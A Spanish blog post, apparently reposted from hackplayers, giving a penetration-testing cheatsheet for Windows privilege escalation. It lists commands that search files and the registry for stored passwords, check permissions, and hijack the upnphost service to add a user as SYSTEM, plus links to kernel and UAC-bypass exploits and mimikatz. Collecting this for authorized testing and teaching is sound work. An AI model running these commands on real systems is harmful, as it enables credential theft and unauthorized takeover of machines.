07 octubre 2012

Cheatsheet para el escalado de privilegios en Windows

En un test de intrusión de una máquina Windows muchas veces conseguimos una consola con un usuario sin privilegios, sobretodo en entornos Citrix o similares. La siguiente tarea en este caso suele ser conseguir acceso como system o con otra cuenta con privilegios de administración o, al menos, más elevados.

Existen multitud de técnicas más o menos efectivas dependiendo los "descuidos" de los administradores, los fallos de configuración, las vulnerabilidades y de lo actualizado que esté el software de la máquina objetivo. Os recomiendo concretamente leeros este artículo de Scott Sutherland y sobretodo esta presentación de insomniasec.com, de la que nuestro amigo Tim Arneaud ha tomado muchas cosas para elaborar un cheatsheet bastante esquemático que a la postre es muy útil y que también queríamos tener a mano.

Esta lista la iremos ampliando según vayamos encontrado nuevas técnicas y funcionalidades. Como siempre, cualquier comentario, sugerencia o feedback son bienvenidos.

Credenciales almacenadas

Buscar credenciales dentro de:

c:\unattend.xml
Estas credenciales están almacenadas en base64 y pueden decodificarse fácilmente:
user@host $ base64 -d cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=

Módulos de Metasploit Framework:
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/enum_unattend.rb
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/credentials/gpp.rb

c:\sysprep.inf
c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

findstr /si password *.txt | *.xml | *.ini
findstr /si pass *.txt | *.xml | *.ini

Programas de recuperación de contraseñas - small - RDP, Mail, IE, VNC, Dialup, Protected Storage...
http://www.nirsoft.net/password_recovery_tools.html

Obtener credenciales en texto plano con mimikatz
http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html

Búsquedas en el registro de Windows

VNC:
reg query "HKCU\Software\ORL\WinVNC3\Password"

Windows Autologin:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

Parámetros SNMP:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

Putty:
reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"

Búsquedas en el registro - portapapeles (opcional)
reg query HKLM /f password /t REG_SZ /s [ |clip]
reg query HKCU /f password /t REG_SZ /s [ |clip]

Aplicaciones GUI inseguras

Ejecutándose como SYSTEM que puedan abrir cmd.exe o directorios "ficheros, logs" etc.

Permisos de directorios
cacls
icacls

Herramientas de Sysinternals

Comprobar procesos y aplicaciones que se ejecutan en el inicio con Autoruns y procmon - sysinternals.com
http://technet.microsoft.com/en-us/sysinternals/bb545027

Servicios apuntando a localizaciones escribibles
*- instalaciones huérfanas - aplicaciones que ya no están instaladas pero que permanecen en el inicio
*- reemplazo de dlls desconocidas
*- Rutas de directorios con permisos inadecuados - ¿posible sobreescritura?

sysinternals tools
accesschk.exe -uwcqv *

*- procesos inseguros
*- robo de tokens de procesos/threads (incognito)
*- hijack handles for write access

Cambio del binario de servicio upnp
http://lanmaster53.com

sc qc upnphost sc config upnphost binpath= "net user /add"
sc config upnphost obj= ".\LocalSystem" password =""
net stop upnphost
net start upnphost

Esto puede funciona con otros servicios si los permisos lo permiten

Programas para comprobar vectores de escalado de privilegios en Windows:
1. Windows-privesc-check ( V1 , V2 )

2. AccessChk

3. AccessEnum

4. Windows Permission Identifier

5. Dark Elevator - hxxp://web.archive.org/web/20100817073927/http://root.net.nz/darkelevator.html

Vulnerabilidades de escalado de privilegios

Windows kernel privilege escalation
KiTrap0D
http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip

Tomcat Windows privilege escalation
http://www.abysssec.com/blog/2008/11/27/tomcat-jrun-privilege-escalation-windows

NtGdiEnableEudc Exploit (MS11-011) - windows XP SP0-3
16262,platforms/windows/dos/16262.,"MS11-011(CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC",2011-03-01,"Nikita Tarakanov",windows,dos,0
http://www.securityfocus.com/bid/46136/exploit
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0045
http://downloads.securityfocus.com/vulnerabilities/exploits/46136.c
http://cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx

Service Tracing Key (MS10-059)
http://www.securityfocus.com/bid/42269/exploit
http://www.argeniss.com/research/ARGENISS-ADV-081002.txt
http://www.securityfocus.com/data/vulnerabilities/exploits/Chimichurri.zip
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2554

Registry Symlink Vuln (MS10-021)
No Public Exploit - VuPEN membership only

Ryujin - ADF.sys priv esc - ms11-080
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2005
http://www.exploit-db.com/exploits/18176
pyinstaller - http://www.pyinstaller.org/
py2exe - http://www.py2exe.org/

UAC Bypass priv esc
http://www.exploit-db.com/exploits/15609
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4398
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
http://www.securityfocus.com/bid/45045/info

Referencias adicionales, fuentes y otros enlaces:
Encyclopaedia of Windows Privilege escalation - Brett Moor
http://www.ruxcon.org.au/2011-talks/encyclopaedia-of-windows-privilege-escalation/


Tomado de: http://www.hackplayers.com/2012/08/cheatsheetescaladoprivilegioswindows.html

No hay comentarios: